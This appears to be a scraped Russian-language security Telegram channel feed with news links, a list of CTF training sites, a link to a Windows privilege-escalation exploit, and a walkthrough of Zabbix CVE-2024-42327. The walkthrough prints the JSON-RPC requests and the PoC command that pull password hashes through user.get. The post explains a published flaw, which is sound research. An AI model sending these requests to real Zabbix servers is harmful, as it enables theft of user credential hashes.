Fsecurity | HH

🎉 Nuclei Templates v10.1.0 #nuclei Теперь nuclei стал немного полезнее для инфраструктурщиков, которые работают по AD. В последнем апдейте добавили очень много шаблонов связанных с low-hangling fruite в AD, к примеру smb v1/not sign, winrm, UAC, LSA и т.д. Сейчас вендоры как сделают git pull и будут продавать сканирование внутрянки под соусом своей экспертизы)) Но это я так, шутки шучу, вы же знаете А если серьезно, то поможет на очень большом скоупе, в остальных случаях: руки + nmap, всегда хватало 🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Рубрика .git leaks * Чуваки за 30 дней вытащили 1439 действительных токенов гитЛАБа и гитХАБа. Токены обеспечивают доступ к: 108 707 репозиториям кода. 2117 организациям/группам. * Список юзеров у которых увели токен с GitHub Список юзеров у которых увели токен с GitLab * Ищем себя )) Ну стоит добавить что это whitehat команда, и если себя нашли просят связаться с Gi7w0rm , добряки )))

🔗Ссылка: https://habr.com/ru/companies/selectel/articles/862372/

Наш Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

CVE-2024-42327 в Zabbix 1 декабря наткнулся на уязвимость CVE-2024-42327 и решил ее изучить, прочитав пару постов, было сказано, что злоумышленник может внедрять произвольные SQL запросы. Нашел PoC и немного удивился, провел ресерч и ничего общего с SQLi не увидел. Давайте разберемся, о чем же эта бага. CVE-2024-42327 - это крит уязвимость (CVSS 9.9), связанная с JSON-RPC API Zabbix. Она позволяет хакеру с минимальными правами (пользователь с доступом к API) извлекать конфиденциальные данные о других учетных записях, включая имена, фамилии, идентификаторы и хэшированные пароли. Проблема кроется в неправильной проверке авторизации и прав доступа, а не в манипуляции SQL запросами. Уязвимость базируется на логической ошибке в реализации API. Метод user.get предоставляет доступ к данным, которые не должны быть видны пользователю с минимальными правами. Злоумышленник использует легитимные методы API, такие как user.login и user.get. Запросы передаются в формате JSON, и сервер возвращает ответ. Результаты запроса включают: Имя пользователя (username), Имя (name) и фамилию (surname), Идентификатор пользователя (userid), Хэш пароля (passwd) Внутри исходника присутствует аргумент selectRole в запросе API и может создать впечатление работы с SQL запросами, так как он содержит поля, такие как roleid и u.passwd. Однако это параметры API, а не запросы к БД. в PoC запускается скрипт cve-2024-42327.py и в нем присутствуют важные этапы. Первый этап: Аутентификация через API Метод user.login используется для получения токена сессии, необходимого для выполнения запросов.

{
    "jsonrpc": "2.0",
    "method": "user.login",
    "params": {
        "username": "guest",
        "password": "guest_password"
    },
    "id": 1
}

После этого сервер возвращает токен

{
    "jsonrpc": "2.0",
    "result": "a43530e0eff1f1ce828cc04dca95eb14",
    "id": 1
}

Второй этап: Перебор идентификаторов пользователей. После получения токена, скрипт вызывает метод user.get, перебирай ID пользователей

{
    "jsonrpc": "2.0",
    "method": "user.get",
    "params": {
        "selectRole": ["roleid, u.passwd", "roleid"],
        "userids": "1"
    },
    "auth": "a43530e0eff1f1ce828cc04dca95eb14",
    "id": 1
}

В ответе возвращаются данные с хэшированным паролем

{
    "jsonrpc": "2.0",
    "result": [
        {
            "userid": "1",
            "username": "Admin",
            "name": "Zabbix",
            "surname": "Administrator",
            "passwd": "$2y$10$92nDno4n0Zm7Ej7Jfsz8WukBfgSS/U0QkIuu8WkJPihXBb2A1UrEK"
        }
    ],
    "id": 1
}

Чтобы провернуть эту схему, нужно иметь доступ к JSON-RPC API Zabbix, чаще всего у него такой эндпоинт.

http://zabbix/api_jsonrpc.php

И учетка с минимальными правами, которая может дернуть метод user.login. Уязвимые версии:

Zabbix 6.0.0–6.0.31
Zabbix 6.4.0–6.4.16
Zabbix 7.0.0.

cve-2024-42327.py -u http://zabbix/api_jsonrpc.php -n Vanya -p Qwerty123

PoC

CVE-2024-42327 / ZBX-25623 * zabbix SQLi * POC

🔄 🚩 💻Список площадок для оттачивания навыков этичного хакинга, подойдет для тренировок CTF. 😉 Hack The Box

Windows, *nix машины для самостоятельного пентеста. Во free тарифе всегда доступно 20 машин. Обучение, академия, лабы и т.д. Есть огромное количество CTF заданий в различных категориях. Возможность сдать экзамены и получить сертификаты CBBH (Certified Bug Bounty Hunter), CPTS (Certified Penetration Testing Specialist), CWEE (Certified Web Exploitation Expert) и CDSA (Certified Defensive Security Analyst) 🙃

😉 TryHackMe

Аналог HackTheBox без CTF заданий. Академия в наличии, также присутствует free тариф 😁

😉 PortSwigger

Академия веб пентеста от создателей BurpSuite. Для сдачи экзамена необходима активная подписка на Burp Suite Professional, цена экзамена 99$ 😈

😉 CTFtime

Информацию почти обо всех прошедших и предстоящих CTF соревнованиях можно найти здесь

😉 Codeby.games

Русскоязычная площадка 😎. Большое (300+) количество CTF задач в самых различных категориях (web, crypto, rev, pwn, osint и т.д.), в наличии Windows и Linux машины. Есть бесплатный тариф

😉 CryptoHack

Один из лучших ресурсов с задачами по криптографии. Нравится криптография ? Вам сюда, от азов до сложнейших задач

😉 Standoff365

Киберполигон от компании 😎 Positive Technologies. Это виртуальная инфраструктура с реалистичными копиями IT-систем из разных отраслей. Достаточно высокий порог вхождения. Ежегодно проводятся турниры, куда вы можете отобраться со своей командой

😉 TaipanByte CTF

Русскоязычная площадка от ребят из команды TaipanByte, большое кол-во тасков (80+) во всех основных категориях

😉 pwn.college

Образовательная платформа, позволяющая изучать и практиковать основные концепции кибербезопасности. Рассчитана на новичков

😉 Kontra

Appsec тренировки, LLM, owasp top10, owasp api top10, aws top10 и т.д.

😉 Linux Journey

Путешествие в мир Linux, основные команды, лабы, руководства

😉 OverTheWire Bandit

Игра из 34 уровней для изучения Linux

😉 Crackmes

Большое количество (~4000) крякми для изучения. Подойдет реверсерам

😉 Pwnable

Для любителей бинарной эксплуатации (PWN)

😉 Cyber-Ed

Русскоязычная площадка. One task of the month - выкладывают по 1ой CTF задаче в месяц, в этом году планируют 10 заданий в категориях: web, pwn, crypto, reverse, misc и т.д.

😉 Root Me

Огромное (500+) кол-во заданий в самых разных категориях

😉 picoCTF

Площадка с CTF заданиями начального уровня, почти на все задания можно найти райтапы

😉 Exploit Education

ВМ Phoenix для изучения уязвимостей, разработки эксплойтов, отладки программного обеспечения и общих проблем кибербезопасности Темы - Network programming, Stack overflows, Format string vulnerabilities, Heap overflows

😉 0xf.at

Парольные загадки (ребусы), например, пароль это сумма чисел от 1 до 446, соответственно надо написать простенькую автоматизацию и ввести в поле ввода

😉 Hacker Test

Простенький хакер квест состоящий из 20 уровней

⚠️ P.S. Если вы знаете подобные площадки, лично проверяли и они заслуживают внимания, пишите пожалуйста в бота обратной связи - @pt_feedback_bot #htb #crackmes #bandit #hacking #ctf #ethical ✈️ Pentest HaT

🔗Ссылка: https://securelist.ru/malware-report-q3-2024-non-mobile-statistics/111145/

Как читают отчет по пентесту (нецензурная версия)

🔗Ссылка: https://www.securitylab.ru/news/554493.php

Привеееет! Всем спасибо за такое количество обратной связи и за то, что вникаете в проблемы канала. Я решил сделать закрытый канал, чтобы избежать различных блокировок, канал будет бесплатным, а кто захочет прсото сможет за интересную информацию задонатить🫡 Желаю вам приятного обучения или просто чтения, просьба не флудить, соблюдать правила, уважать друг друга, не сливать материалы, пользоваться по назначению полученными знаниями, делиться знаниями в ответ и помогать своим товарищам. Сделал много веток, поскольку и контент у меня разносольный. Велком в наш закрытый клуб: https://t.me/+0H-FyThRQl1lMzVi Ссылка на приватный чат также будет в описании этого канала.

🔗Ссылка: https://www.securitylab.ru/news/554444.php

🔗Ссылка: https://www.securitylab.ru/analytics/554408.php

CVE-2024-38193: Windows LPE PATCHED: August 13, 2024 https://github.com/Nephster/CVE-2024-38193 P.S. Протестил на Win11, работает #git #exploit #lpe #pentest #redteam

🔗Ссылка: https://habr.com/ru/companies/bastion/articles/862388/

Наш Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈 P.s. сейчас там открылся набор в PFS Academy

🔗Ссылка: https://www.securitylab.ru/news/554471.php

🔗Ссылка: https://www.securitylab.ru/news/554475.php

🔗Ссылка: https://www.kali.org/blog/contributing-to-kali/

AWS Unauthorized Access to Metadata and User Data * Link